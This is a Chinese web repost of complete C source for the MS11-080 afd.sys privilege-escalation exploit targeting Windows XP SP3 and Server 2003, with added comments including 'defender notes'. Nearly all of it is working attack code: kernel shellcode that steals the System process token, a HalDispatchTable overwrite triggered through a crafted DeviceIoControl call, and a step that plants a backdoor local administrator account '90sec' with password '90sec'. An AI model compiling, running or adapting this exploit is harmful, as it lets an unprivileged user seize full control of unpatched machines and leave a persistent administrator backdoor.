MS11080漏洞利用
文章作者:
来源于互联网
发布时间:2012/2/18 21:05:00 浏览次数:9014 次
MS11-080
/*
* MS11-080 Afd.sys Privilege Escalation Exploit
* 来源:Matteo Memelli,
http://www.exploit-db.com/exploits/18176/
* 改编:KiDebug,
Google@pku.edu.cn
* 编译:VC6.0
* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户 and webshell
*/
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
#pragma comment (lib, "ws2_32.lib")
// Globals shared with adduser(): the account record handed to NetUserAdd and its
// parameter-error out-value (despite the name, an index of the offending field,
// not a Win32 error code).
USER_INFO_1 ui;
DWORD dwError = 0;
// Undocumented ntdll layouts returned by NtQuerySystemInformation with
// information class 11 (SystemModuleInformation); see the call in main().
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
HANDLE Section; // Not filled in
PVOID MappedBase;
PVOID ImageBase; // kernel-mode load address; main() reads this from entry 0
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName; // index into FullPathName where the bare file name starts
UCHAR FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
// Holds a single entry. main() passes sizeof(RTL_PROCESS_MODULES), expects a
// length-mismatch status back and still reads Modules[0] — see the note there.
typedef struct _RTL_PROCESS_MODULES {
ULONG NumberOfModules;
RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
// Prototypes for native API resolved from ntdll.dll at run time (GetProcAddress
// in main()). NOTE(review): the real NtAllocateVirtualMemory takes PVOID* for
// BaseAddress and SIZE_T* for RegionSize; main() passes (PVOID*)&BaseAddress and
// a PULONG, which these loose typedefs accept silently. That only lines up on
// 32-bit builds, which is all this file targets.
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_ NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;
// Kernel virtual addresses computed in main() and read by the inline asm in
// ShellCode(). ULONG because the code is 32-bit only.
ULONG PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;
/*
 * Kernel-mode payload. main() copies exactly 100 bytes of this function into a
 * user-mode NOP sled and later reaches it through the HalDispatchTable slot it
 * overwrote (NtQueryIntervalProfile call in main()). Declared naked so the
 * compiler emits no prologue/epilogue: the asm saves and restores every
 * register and the flags itself and ends with an explicit ret.
 * Inputs are the three kernel addresses main() stores in the globals
 * PsReferencePrimaryToken, PsInitialSystemProcess and PsGetThreadProcess.
 * Net effect: one DWORD of the current process object is overwritten with the
 * value at the same offset in the System process object.
 * Defender notes: the fixed 100-byte copy makes this blob easy to signature,
 * and the kernel write it depends on is what the MS11-080 update removed; the
 * lasting artefact on a host is the account created by adduser() afterwards.
 */
void _declspec(naked) ShellCode()
{
__asm
{
pushad // preserve all general registers ...
pushfd // ... and flags; this runs inside a kernel call path
mov esi,PsReferencePrimaryToken // kernel address of nt!PsReferencePrimaryToken (computed in main)
FindTokenOffset:
lodsb // scan forward one byte at a time ...
cmp al, 8Dh; // ... until the first 0x8D byte (x86 `lea` opcode byte)
jnz FindTokenOffset
mov edi,[esi+1] // the 32-bit displacement that follows is used below as a field offset (assumption: verify against the target kernel build)
mov esi,PsInitialSystemProcess // address of the nt!PsInitialSystemProcess variable ...
mov esi,[esi] // ... dereferenced: pointer to the System process object
push fs:[124h] // argument for the call below; presumably the current thread pointer on 32-bit kernels — confirm for the target build
mov eax,PsGetThreadProcess
call eax // eax = process object that owns the pushed thread
add esi, edi // source: System process object + offset
add edi, eax // destination: current process object + offset
movsd // copy one DWORD from [esi] to [edi]
popfd
popad
ret // naked function: return to the kernel caller manually
}
}
/*
 * Post-exploitation step: create the local user "90sec" (password "90sec") and
 * add it to the local Administrators group. This can only succeed once the
 * process holds sufficient privilege, i.e. after ShellCode() has run.
 * Failures are silent — no message and no return value — and dwError receives
 * NetUserAdd's parameter-error index, not a Win32 error code.
 * Defender notes: the new local administrator is the persistent artefact of
 * this exploit; it shows up in the local SAM and in account-management audit
 * events (4720 user created / 4732 member added, on Vista and later).
 * Mixed declarations and statements below mean this file is built as C++
 * (VC6, per the header) rather than C89.
 */
void adduser()
{
ui.usri1_name =L"90sec";
ui.usri1_password =L"90sec";
ui.usri1_priv = USER_PRIV_USER; // ordinary user; elevation comes from the group membership below
ui.usri1_home_dir = NULL;
ui.usri1_comment = NULL;
ui.usri1_flags = UF_SCRIPT; // documented as required for USER_INFO_1
ui.usri1_script_path = NULL;
if (NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError)==NERR_Success) // NULL server = local machine; level 1 = USER_INFO_1
{
printf("[*] User has been successfully added\n");
wchar_t szAccountName[100]={0};
wcscpy(szAccountName,ui.usri1_name); // unbounded copy; only safe because the name is a 5-character literal
LOCALGROUP_MEMBERS_INFO_3 account; // level 3: member identified by its name string
account.lgrmi3_domainandname=szAccountName;
if (NetLocalGroupAddMembers(NULL,L"Administrators",3,(LPBYTE)&account,1)==NERR_Success)
{
printf("[*] Add to Administrators success\n");
return ;
}
}
}
/*
 * Entry point. Sequence: resolve native API from ntdll, map the low page,
 * locate the kernel image and compute kernel addresses, stage the payload in
 * user space, hand afd.sys a kernel address through DeviceIoControl, call
 * NtQueryIntervalProfile to reach the patched HalDispatchTable slot, then
 * create the administrator account. Every failure path is a bare `return`;
 * nothing is freed, closed or reported.
 * Defender notes (each visible below): an unprivileged process querying
 * SystemModuleInformation, a user-mode LoadLibrary of ntoskrnl.exe, an RWX
 * allocation at base address 1 (the null/low page), a 0x20000-byte RWX region
 * at a fixed address, and a DeviceIoControl on a socket handle whose output
 * buffer is a kernel address are all observable host signals; the kernel-side
 * fix is the MS11-080 update named in the file header.
 * `void main` is non-standard (no exit status); the header says VC6.
 */
void main( )
{
//USER_INFO_1 ui;
//DWORD dwError = 0;
HMODULE ntdll = GetModuleHandle( "ntdll.dll" ); // already mapped in every process
// Native API resolved at run time; the function-pointer typedefs sit above main().
NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
return;
// Reserve and commit one RWX page starting at address 1 (rounded down to the
// low page by the kernel); this is what makes the later writes to 0x1000 valid.
// Later Windows versions refuse user-mode allocations in this region.
ULONG BaseAddress = 1 , RegionSize = 0x1000, status;
status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // (HANDLE)-1 = current process
if ( status )
return;
// Fetch the kernel's module information; a single call is enough.
ULONG NtoskrnlBase;
RTL_PROCESS_MODULES module;
status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
// The one-entry buffer is too small on purpose: the call is expected to report
// a length mismatch yet the first entry is still relied upon being filled in.
// NOTE(review): XP/2003-era behaviour; not guaranteed on other builds.
if ( status != 0xC0000004 ) //STATUS_INFO_LENGTH_MISMATCH
return;
NtoskrnlBase = (ULONG)module.Modules[0].ImageBase; // assumes entry 0 is the kernel image
// Load ntoskrnl.exe into this process as an ordinary DLL, only to resolve exports.
HMODULE ntoskrnl;
ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) ); // OffsetToFileName skips the directory part
if ( ntoskrnl == NULL )
return;
// Translate each export's user-mode address into its kernel address:
// (address in the user-mode mapping - user-mode base) + real kernel base.
WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; // the address to overwrite (the author's offset into HalDispatchTable; not explained in the source)
PsInitialSystemProcess = (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
PsGetThreadProcess = (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
// From here on is the part the original author left as "do it your own way".
// Stage a 0x20000-byte RWX region at a fixed user address, fill it with NOPs
// (0x90) and drop 100 bytes of ShellCode() into the middle of it.
if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
return;
memset((PVOID)0x02070000,0x90,0x20000);
memcpy((PVOID)0x02080000,ShellCode,100); // fixed-size copy; assumes the compiled ShellCode is no longer than 100 bytes
WSADATA ws;
SOCKET tcp_socket;
struct sockaddr_in peer;
ULONG dwReturnSize;
WSAStartup(0x0202,&ws); // return value not checked
peer.sin_family = AF_INET;
peer.sin_port = htons(4455);
peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );
tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // not checked against INVALID_SOCKET
// Note the sense of this test: connect() returns non-zero on failure, so the
// banner prints when nothing is listening on 127.0.0.1:4455. The socket handle
// is used below either way; whether its connection state matters to the afd
// path can't be told from this file.
if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
{
printf("[>] ms11-08 Exploit\n");
printf("[>] by:Mer4en7y@90sec.org\n");
}
// Controlled input for the IOCTL: 25 bytes from buf1 placed on the low page,
// the remainder of the 0x108-byte request padded with 0x45.
UCHAR buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";
memset((PVOID)0x1000,0x45,0x108);
memcpy((PVOID)0x1000,buf1,25);
// The vulnerable afd.sys IOCTL is given a kernel address (WriteToHalDispatchTable)
// as its output buffer. The messages sit on the failing branch (`!`), so the
// call is apparently expected to report failure even when the kernel write has
// happened — inferred from the control flow, not stated in the source.
if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
{
printf("[*] Token system command\n");
printf("[*] command add user 90sec 90sec\n");
}
NtQueryIntervalProfile( 2, &status ); // reaches the patched HalDispatchTable slot, which now points into the sled holding ShellCode
adduser(); // only succeeds if the process now carries the System process's token
return;
}